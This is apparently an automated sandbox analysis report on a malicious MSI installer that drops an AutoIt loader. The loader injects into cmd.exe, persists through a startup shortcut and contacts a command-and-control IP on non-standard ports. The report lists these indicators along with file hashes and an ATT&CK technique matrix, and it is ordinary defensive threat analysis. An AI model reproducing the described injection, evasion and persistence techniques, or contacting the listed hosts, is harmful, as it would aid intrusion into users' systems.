            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeRegistry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0Jump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\ProgramData\fkeabad\Autoit3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\ProgramData\fkeabad\Autoit3.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion ProductIDJump to behavior
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00451190 GetUserNameA,9_2_00451190
            Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: mcshield.exe
            Source: cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: superantispyware.exe
            Source: C:\Windows\SysWOW64\cmd.exeCode function: 9_2_00428120 bind,9_2_00428120
            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
            1
            Replication Through Removable Media
            Windows Management Instrumentation1
            DLL Side-Loading
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            1
            Input Capture
            11
            Peripheral Device Discovery
            1
            Replication Through Removable Media
            1
            Archive Collected Data
            Exfiltration Over Other Network Medium1
            Ingress Tool Transfer
            Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
            Default AccountsScheduled Task/Job2
            Registry Run Keys / Startup Folder
            112
            Process Injection
            1
            Deobfuscate/Decode Files or Information
            LSASS Memory1
            Account Discovery
            Remote Desktop Protocol1
            Input Capture
            Exfiltration Over Bluetooth1
            Encrypted Channel
            Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
            Domain AccountsAt (Linux)1
            Services File Permissions Weakness
            2
            Registry Run Keys / Startup Folder
            2
            Obfuscated Files or Information
            Security Account Manager4
            File and Directory Discovery
            SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration11
            Non-Standard Port
            Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
            Local AccountsAt (Windows)Logon Script (Mac)1
            Services File Permissions Weakness
            1
            DLL Side-Loading
            NTDS44
            System Information Discovery
            Distributed Component Object ModelInput CaptureScheduled Transfer1
            Non-Application Layer Protocol
            SIM Card SwapCarrier Billing Fraud
            Cloud AccountsCronNetwork Logon ScriptNetwork Logon Script1
            File Deletion
            LSA Secrets111
            Security Software Discovery
            SSHKeyloggingData Transfer Size Limits11
            Application Layer Protocol
            Manipulate Device CommunicationManipulate App Store Rankings or Ratings
            Replication Through Removable MediaLaunchdRc.commonRc.common21
            Masquerading
            Cached Domain Credentials21
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
            External Remote ServicesScheduled TaskStartup ItemsStartup Items21
            Virtualization/Sandbox Evasion
            DCSync3
            Process Discovery
            Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
            Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/Job112
            Process Injection
            Proc Filesystem1
            Application Window Discovery
            Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue
            Exploit Public-Facing ApplicationPowerShellAt (Linux)At (Linux)1
            Services File Permissions Weakness
            /etc/passwd and /etc/shadow1
            System Owner/User Discovery
            Software Deployment ToolsData StagedExfiltration Over Asymmetric Encrypted Non-C2 ProtocolWeb ProtocolsRogue Cellular Base StationData Destruction
Behavior Graph ID: 1280109, Sample: 15e7232gfN.msi, Start date: 26/07/2023, Architecture: WINDOWS, Score: 64

Signatures attached to the sample node: Multi AV Scanner detection for domain / URL; Connects to many ports of the same IP (likely port scanning); Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Uses known network protocols on non-standard ports.

Process tree recovered from the graph (numbers in parentheses are the graph's node IDs):
• msiexec.exe (9): drops C:\Windows\Installer\MSIDAD.tmp (PE32) and C:\Windows\Installer\MSI3433.tmp (PE32)
  • msiexec.exe (18)
    • Autoit3.exe (23): drops C:\temp\AutoIt3.exe (PE32)
      • cmd.exe (38): contacts 80.66.88.145 (49690, 49691, 49692; RISS-ASRU, Russian Federation); drops C:\ProgramData\fkeabad\Autoit3.exe (PE32); signature: Creates a thread in another existing process (thread injection)
        • OLicenseHeartbeat.exe (51)
    • expand.exe (26): drops C:\Users\user\AppData\...\Autoit3.exe (copy) (PE32) and C:\...\4d7bae1ad8a0f940a33036ae38ff0554.tmp (PE32)
      • conhost.exe (43)
    • icacls.exe (28)
      • conhost.exe (45)
    • icacls.exe (30)
      • conhost.exe (47)
• Autoit3.exe (12)
  • cmd.exe (20): signature: Creates a thread in another existing process (thread injection)
    • SciTE.exe (32)
      • msinfo32.exe (49)
    • MyProg.exe (34)
    • ADelRCP.exe (36)
• msiexec.exe (14)
• 8 other processes (16)

Source | Detection | Scanner | Label | Link
15e7232gfN.msi | 2% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
C:\ProgramData\fkeabad\Autoit3.exe | 3% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\224f4e28a4d4462680bba17a3145169d$dpx$.tmp\4d7bae1ad8a0f940a33036ae38ff0554.tmp | 3% | ReversingLabs
C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe (copy) | 3% | ReversingLabs
C:\Windows\Installer\MSI3433.tmp | 0% | ReversingLabs
C:\Windows\Installer\MSIDAD.tmp | 0% | ReversingLabs
C:\temp\AutoIt3.exe | 3% | ReversingLabs
            No Antivirus matches
            No Antivirus matches
Source | Detection | Scanner | Label | Link
http://80.66.88.145:9999d | 0% | Avira URL Cloud | safe
http://80.66.88.145& | 0% | Avira URL Cloud | safe
http://80.66.88.145:7891/ | 6% | Virustotal | | Browse
http://80.66.88.145:9999n | 0% | Avira URL Cloud | safe
http://80.66.88.145:9999l | 0% | Avira URL Cloud | safe
http://80.66.88.145 | 7% | Virustotal | | Browse
http://80.66.88.145 | 0% | Avira URL Cloud | safe
http://80.66.88. | 0% | Avira URL Cloud | safe
http://80.66.88.145:7891/ | 0% | Avira URL Cloud | safe
http://80.66.88.145:9999pT$ | 0% | Avira URL Cloud | safe
http://80.66.88.145:9999 | 0% | Avira URL Cloud | safe
http://80.66.88.145:7891 | 0% | Avira URL Cloud | safe
http://80.66.88.145:9999x | 0% | Avira URL Cloud | safe
http://80.66.88.145:9999hd | 0% | Avira URL Cloud | safe
            No contacted domains info
Name | Malicious | Antivirus Detection | Reputation
http://80.66.88.145:7891/ | true
• 6%, Virustotal, Browse
• Avira URL Cloud: safe
unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://80.66.88.145 | cmd.exe, 0000000E.00000002.708417301.000000000517B000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp | false
• 7%, Virustotal, Browse
• Avira URL Cloud: safe
unknown
http://www.autoitscript.com/autoit3/J | Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000000.557064508.0000000000A49000.00000002.00000001.01000000.00000007.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000000.589433696.0000000000F59000.00000002.00000001.01000000.0000000B.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp | false
high
http://80.66.88.145:9999d | SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp | false
• Avira URL Cloud: safe
low
http://80.66.88.145& | Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp | false
• Avira URL Cloud: safe
low
http://80.66.88.145:9999 | SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp | false
• Avira URL Cloud: safe
unknown
http://80.66.88.145:9999n | SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp | false
• Avira URL Cloud: safe
low
http://80.66.88.145:9999l | cmd.exe, 00000009.00000002.616883860.0000000005FBC000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000002.818520760.00000000082A0000.00000004.00001000.00020000.00000000.sdmp | false
• Avira URL Cloud: safe
low
http://80.66.88. | SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp | false
• Avira URL Cloud: safe
low
https://www.autoitscript.com/autoit3/ | Autoit3.exe, 00000008.00000003.562124824.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000003.561146540.0000000004693000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 00000008.00000002.567488146.0000000004482000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000002.614481086.0000000005043000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.565892356.00000000057C3000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 00000009.00000003.568468689.0000000005BC7000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000003.592030670.0000000005033000.00000004.00001000.00020000.00000000.sdmp, Autoit3.exe, 0000000D.00000002.598455223.0000000004C03000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000003.596629594.0000000005703000.00000004.00001000.00020000.00000000.sdmp, cmd.exe, 0000000E.00000002.707423919.0000000004F93000.00000004.00001000.00020000.00000000.sdmp, SciTE.exe, 00000018.00000003.685906923.0000000008C13000.00000004.00001000.00020000.00000000.sdmp | false
high
http://80.66.88.145:7891 | cmd.exe, 00000009.00000002.614739543.000000000522B000.00000004.00001000.00020000.00000000.sdmp | false
• Avira URL Cloud: safe
unknown
http://80.66.88.145:9999pT$ | cmd.exe, 00000009.00000002.614290853.0000000004E60000.00000004.00001000.00020000.00000000.sdmp | false
• Avira URL Cloud: safe
low
http://80.66.88.145:9999x | cmd.exe, 00000009.00000002.616707929.0000000005B00000.00000004.00001000.00020000.00000000.sdmp | false
• Avira URL Cloud: safe
low
http://80.66.88.145:9999hd | SciTE.exe, 00000018.00000002.820052302.0000000008EE4000.00000004.00001000.00020000.00000000.sdmp | false
• Avira URL Cloud: safe
low
IP | Domain | Country | ASN | ASN Name | Malicious
80.66.88.145 | unknown | Russian Federation | 20803 | RISS-ASRU | true
                Joe Sandbox Version:38.0.0 Beryl
                Analysis ID:1280109
                Start date and time:2023-07-26 13:59:55 +02:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 11m 38s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed:27
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample file name:15e7232gfN.msi
                Original Sample Name:6e068b9dcd8df03fd6456faeb4293c036b91a130a18f86a945c8964a576c1c70.msi
                Detection:MAL
                Classification:mal64.troj.evad.winMSI@51/27@0/1
                EGA Information:
                • Successful, ratio: 50%
                HDC Information:
                • Successful, ratio: 99.9% (good quality ratio 97.3%)
                • Quality average: 78.9%
                • Quality standard deviation: 27.2%
                HCA Information:
                • Successful, ratio: 97%
                • Number of executed functions: 24
                • Number of non-executed functions: 11
                Cookbook Comments:
                • Found application associated with file extension: .msi
                • Close Viewer
                • Exclude process from analysis (whitelisted): audiodg.exe
                • Excluded domains from analysis (whitelisted): ctldl.windowsupdate.com
• Not all processes were analyzed, report is missing behavior information
                • Report creation exceeded maximum time and may have missing disassembly code information.
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                • Report size getting too big, too many NtOpenFile calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.
                • Report size getting too big, too many NtWriteVirtualMemory calls found.
Time | Type | Description
14:01:03 | API Interceptor | 4x Sleep call for process: Autoit3.exe modified
14:01:06 | Autostart | Run: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aafaecg.lnk
14:01:08 | API Interceptor | 13x Sleep call for process: cmd.exe modified
14:02:03 | API Interceptor | 35x Sleep call for process: SciTE.exe modified
14:02:27 | API Interceptor | 1x Sleep call for process: MyProg.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name | Context
80.66.88.145 | no_halt_7891.msi | malicious | Unknown | 80.66.88.145:7891/
80.66.88.145 | no_halt_7891.msi | malicious | Unknown | 80.66.88.145:7891/
                No context
Match | Associated Sample Name / URL | Detection | Threat Name | Context
RISS-ASRU | no_halt_7891.msi | malicious | Unknown | 80.66.88.145
RISS-ASRU | no_halt_7891.msi | malicious | Unknown | 80.66.88.145
RISS-ASRU | Gsismkswcbe.cmd.exe.bat | malicious | Unknown | 80.66.75.172
RISS-ASRU | file.exe | malicious | Tofsee | 80.66.75.254
RISS-ASRU | no_halt_opts_enabled.msi | malicious | Unknown | 80.66.88.145
RISS-ASRU | no_halt_opts_enabled.msi | malicious | Unknown | 80.66.88.145
RISS-ASRU | jQq9HLW8XQ.exe | malicious | CryptOne, Remcos | 80.66.75.172
RISS-ASRU | file.exe | malicious | Tofsee | 80.66.75.254
RISS-ASRU | http://80.66.75.37/rxtygf.exe | malicious | Unknown | 80.66.75.37
RISS-ASRU | 5MYFRkQgfM.exe | malicious | Tofsee | 80.66.75.254
RISS-ASRU | kfxuza.bat | malicious | Remcos | 80.66.75.116
RISS-ASRU | Xecgqu.exe | malicious | Unknown | 80.66.75.37
RISS-ASRU | Bxbnmjpq.exe | malicious | Unknown | 80.66.75.37
RISS-ASRU | SecuriteInfo.com.Win32.RansomX-gen.11180.14760.exe | malicious | Unknown | 80.66.75.37
RISS-ASRU | file.exe | malicious | Tofsee | 80.66.75.254
RISS-ASRU | file.exe | malicious | Tofsee | 80.66.75.254
RISS-ASRU | file.exe | malicious | Tofsee | 80.66.75.254
RISS-ASRU | w3exo8I4Tb.exe | malicious | Tofsee | 80.66.75.254
RISS-ASRU | file.exe | malicious | Tofsee | 80.66.75.254
RISS-ASRU | file.exe | malicious | Tofsee | 80.66.75.254
                No context
Match | Associated Sample Name / URL | Detection | Threat Name
C:\ProgramData\fkeabad\Autoit3.exe | xIgS6K1nPs.rtf | malicious | Unknown
C:\ProgramData\fkeabad\Autoit3.exe | no_halt_7891.msi | malicious | Unknown
C:\ProgramData\fkeabad\Autoit3.exe | no_halt_7891.msi | malicious | Unknown
C:\ProgramData\fkeabad\Autoit3.exe | no_halt_opts_enabled.msi | malicious | Unknown
C:\ProgramData\fkeabad\Autoit3.exe | no_halt_opts_enabled.msi | malicious | Unknown
C:\ProgramData\fkeabad\Autoit3.exe | MAERSK_LINE_CONTAINER_OVERSEAS_SHIPPER.exe | malicious | FormBook
C:\ProgramData\fkeabad\Autoit3.exe | tBZ__Qj9(778).cmd | malicious | Unknown
C:\ProgramData\fkeabad\Autoit3.exe | 11.ps1 | malicious | Unknown
C:\ProgramData\fkeabad\Autoit3.exe | SARA_II__REQ._FOR_PROVISION_-_JUL_2023.exe | malicious | FormBook, NSISDropper
C:\ProgramData\fkeabad\Autoit3.exe | SARA_II__REQ._FOR_PROVISION_-_JUL_2023.exe | malicious | FormBook, NSISDropper
C:\ProgramData\fkeabad\Autoit3.exe | 2.ps1 | malicious | Unknown
C:\ProgramData\fkeabad\Autoit3.exe | 337864093.exe | malicious | AgentTesla
C:\ProgramData\fkeabad\Autoit3.exe | fa1lA9Hw1U(6958799).cmd | malicious | Unknown
C:\ProgramData\fkeabad\Autoit3.exe | SecuriteInfo.com.FileRepMalware.18044.32672.exe | malicious | Lokibot
C:\ProgramData\fkeabad\Autoit3.exe | MARMEA_-_PROVISION_(QUOTATION).exe | malicious | FormBook, NSISDropper
C:\ProgramData\fkeabad\Autoit3.exe | MARMEA_-_PROVISION_(QUOTATION).exe | malicious | FormBook, NSISDropper
C:\ProgramData\fkeabad\Autoit3.exe | 27-06-2023__PDF_00233466115969388.exe | malicious | Remcos
C:\ProgramData\fkeabad\Autoit3.exe | Scan-02.exe | malicious | FormBook
C:\ProgramData\fkeabad\Autoit3.exe | ZANTE_-_VESSEL'S_PARTICULARS.exe | malicious | FormBook, NSISDropper
C:\ProgramData\fkeabad\Autoit3.exe | bank_swift.exe | malicious | Snake Keylogger
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):893608
                                                        Entropy (8bit):6.620131693023677
                                                        Encrypted:false
                                                        SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                        MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                        SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                        SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                        SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Joe Sandbox View:
                                                        • Filename: xIgS6K1nPs.rtf, Detection: malicious
                                                        • Filename: no_halt_7891.msi, Detection: malicious
                                                        • Filename: no_halt_7891.msi, Detection: malicious
                                                        • Filename: no_halt_opts_enabled.msi, Detection: malicious
                                                        • Filename: no_halt_opts_enabled.msi, Detection: malicious
                                                        • Filename: MAERSK_LINE_CONTAINER_OVERSEAS_SHIPPER.exe, Detection: malicious
                                                        • Filename: tBZ__Qj9(778).cmd, Detection: malicious
                                                        • Filename: 11.ps1, Detection: malicious
                                                        • Filename: SARA_II__REQ._FOR_PROVISION_-_JUL_2023.exe, Detection: malicious
                                                        • Filename: SARA_II__REQ._FOR_PROVISION_-_JUL_2023.exe, Detection: malicious
                                                        • Filename: 2.ps1, Detection: malicious
                                                        • Filename: 337864093.exe, Detection: malicious
                                                        • Filename: fa1lA9Hw1U(6958799).cmd, Detection: malicious
                                                        • Filename: SecuriteInfo.com.FileRepMalware.18044.32672.exe, Detection: malicious
                                                        • Filename: MARMEA_-_PROVISION_(QUOTATION).exe, Detection: malicious
                                                        • Filename: MARMEA_-_PROVISION_(QUOTATION).exe, Detection: malicious
                                                        • Filename: 27-06-2023__PDF_00233466115969388.exe, Detection: malicious
                                                        • Filename: Scan-02.exe, Detection: malicious
                                                        • Filename: ZANTE_-_VESSEL'S_PARTICULARS.exe, Detection: malicious
                                                        • Filename: bank_swift.exe, Detection: malicious
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\cmd.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):784356
                                                        Entropy (8bit):6.500990461253042
                                                        Encrypted:false
                                                        SSDEEP:12288:6byAIRMKMJZCL+TWHZMxdHQgCUCAH2zxMSTaiTDBCphXUgn+DRVnNsPlU0R/Nexe:OgLQQgogvXUnsPlU0ZNMIpZ
                                                        MD5:ED1131E98DAD331D3FEB1C38B2C6BA51
                                                        SHA1:BB3F4522D7D0D3F4D5B9917019242AE5496F6F16
                                                        SHA-256:B68861CDFC100021261A1F3067324628A31E85BA7EE3857FBD496D4AEFB2E68D
                                                        SHA-512:06BD7E2E7F72A2E572435773DDC20E22D25168DF923ADAFD8535367A9D6722AFA04EFA3D5A21737BDB5146F8B29F23DFEF6B281E007AFF10A98696A998D24692
                                                        Malicious:false
                                                        Preview:
                                                        Process:C:\Users\user\AppData\Local\Temp\MW-bbb409b2-52bd-4ce9-ab77-086847a644a4\files\Autoit3.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):129
                                                        Entropy (8bit):6.439332390998306
                                                        Encrypted:false
                                                        SSDEEP:3:diG/sNsJ5jJEcApcAPmC2tWGBikSFIiBWCNmpn:T/sN+JEcA+1thBikSFJWGmp
                                                        MD5:EFE32663E95C34B9E5DFD8EA4CE9E337
                                                        SHA1:C4AFC04189F77CB661A3ADBFCB7B77989CBB0AFE
                                                        SHA-256:8B5BFA938B0DEA6D29384BE513A887FA4EC94FD08CF68520E3C51E4B17A7CB31
                                                        SHA-512:AF1C463891E0FBCA195DF8B39B5DC63CFE04FECABD1C569DD36E894AB52CB7CFD481D3901F93670D7CC74F5CCA9A37E37A41DF06DB13ABBC6F88F35BC7FAB74B
                                                        Malicious:false
                                                        Preview:qaLiJpqL4.....h.o]....a.....S.[........<f..'.....6I...8.C4a......r.....h..s.f......GW.v..o........... G.0T.8P..........S...
                                                        Process:C:\Windows\SysWOW64\msiexec.exe
                                                        File Type:Microsoft Cabinet archive data, many, 1669773 bytes, 2 files, at 0x2c +A "Autoit3.exe" +A "UGtZgHHT.au3", ID 56955, number 1, 51 datablocks, 0 compression
                                                        Category:dropped
                                                        Size (bytes):1669773
                                                        Entropy (8bit):7.004183948977661
                                                        Encrypted:false
                                                        SSDEEP:24576:eT9FsEsyt8l+E+s1tB7parWM0+AL5QgZQvUXtAqlU0ZyMRpF:k9FBJZEH1X1arF0vN/nXr
                                                        MD5:E7C3B16ED93B760546AE6756B12644DA
                                                        SHA1:99B3B1AF70B45B4B815A814F61F9B6E509CD3BB6
                                                        SHA-256:659733A584C52078AC6B568DFB34A089BEF2B3835A5EA737D32C1623A468B743
                                                        SHA-512:B6EEAAEEB1F7C8335076075BC8033D5D4744544F3937EEADDCBEF5F7BA257A64C20A47F8388C1E8F10C5821DA8ABE0683BE8FD60C3E1A9AEA25E4A705E2F8B41
                                                        Malicious:false
                                                        Preview:MSCF.....z......,...............{...e...3..............VB. .Autoit3.exe............VB. .UGtZgHHT.au3.t/.Y....MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B...................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):893608
                                                        Entropy (8bit):6.620131693023677
                                                        Encrypted:false
                                                        SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                        MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                        SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                        SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                        SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........sD.R.*.R.*.R.*..C..P.*....S.*._@..a.*._@....*._@..g.*.[j..[.*.[j..w.*.R.+.r.*......*....S.*._@..S.*.R...P.*....S.*.RichR.*.........................PE..L....q.Z.........."...............................@.......................................@...@.......@.........................|.......P....................p...q...;.............................. [..@............................................text............................... ..`.rdata..............................@..@.data...t........R..................@....rsrc...P............<..............@..@.reloc...q...p...r..................@..B................................................................................................................................................................................................................................................................................
                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):775656
                                                        Entropy (8bit):6.502577735066428
                                                        Encrypted:false
                                                        SSDEEP:12288:pbyAIRMKMJZCL+TWHZMxdHQgCUCAH2zxMSTaiTDBCphXUgn+DRVnNsPlU0R/NexP:RgLQQgogvXUnsPlU0ZNMIpc
                                                        MD5:1B524D03B27B94906C1A87B207E08179
                                                        SHA1:8FBAD6275708A69B764992B05126E053134FB9E9
                                                        SHA-256:1AF981D9C5128B3657CDB5506D61563E0D1908B957E5DD6842059D6D3CFDC622
                                                        SHA-512:1E0F2AEA5DAA40B6CB7DF61BA86E0956356AB7B7ECFC9E2934BC85EEC8D42D3AEB32858DD0EAD24E82EF261A4120F6374263B7AF9256EB79A294D51273CC4F6E
                                                        Malicious:false
                                                        Preview:
                                                        Process:C:\Windows\SysWOW64\expand.exe
                                                        File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):893608
                                                        Entropy (8bit):6.620131693023677
                                                        Encrypted:false
                                                        SSDEEP:12288:6pVWeOV7GtINsegA/hMyyzlcqikvAfcN9b2MyZa31twoPTdFxgawV2M01:6T3E53Myyzl0hMf1tr7Caw8M01
                                                        MD5:C56B5F0201A3B3DE53E561FE76912BFD
                                                        SHA1:2A4062E10A5DE813F5688221DBEB3F3FF33EB417
                                                        SHA-256:237D1BCA6E056DF5BB16A1216A434634109478F882D3B1D58344C801D184F95D
                                                        SHA-512:195B98245BB820085AE9203CDB6D470B749D1F228908093E8606453B027B7D7681CCD7952E30C2F5DD40F8F0B999CCFC60EBB03419B574C08DE6816E75710D2C
                                                        Malicious:false
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 3%
